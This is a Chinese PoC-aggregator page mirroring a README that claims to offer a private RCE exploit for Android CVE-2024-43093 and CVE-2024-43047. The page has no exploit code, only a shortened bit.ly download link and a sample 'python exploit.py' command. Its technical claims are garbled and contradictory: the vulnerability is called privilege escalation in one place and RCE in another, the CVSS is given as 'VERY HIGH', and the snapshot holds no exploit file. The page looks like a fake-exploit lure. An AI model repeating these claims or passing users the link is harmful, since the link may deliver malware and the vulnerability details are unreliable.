POC详情: 281dfca942acd831e98f6990321dd05872809492

来源
关联漏洞
标题: Google Android 安全漏洞 (CVE-2024-43093)
描述:Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。 Google Android存在安全漏洞,该漏洞源于Unicode规范化不正确。攻击者利用该漏洞可以提升权限。
介绍
# CVE-2024-43093/43047: RCE in Android System.

## Overview
CVE-2024-43093 and CVE-2024-43047

## Exploit:
### [Download here](https://bit.ly/3AG3GCn)

## Details

- **CVE ID**: [CVE-2024-43047]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 7.8

- **CVE ID**: [CVE-2024-43093]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: VERY HIGH


## Vulnerability Description

CVE-2024-43093 is a critical vulnerability in the Android system.

Successful exploitation of the vulnerabilities could lead to remote code execution, denial of service, elevation of privilege or information disclosure on an affected system.

CVE-2024-43093 is a critical vulnerability in the Android system.

This critical vulnerability, reported as CVE-2024-43047 with a CVSS score of 7.8, is due to a Use-After-Free issue in the DSP algorithm service. It may cause memory corruption when saving the HLOS memory card or using RCE.

## Affected Versions

Android version 12, 12L, 13, 14 and 15

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```


## Exploit:
### [Download here](https://bit.ly/3AG3GCn)



文件快照

[4.0K] /data/pocs/281dfca942acd831e98f6990321dd05872809492 └── [1.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。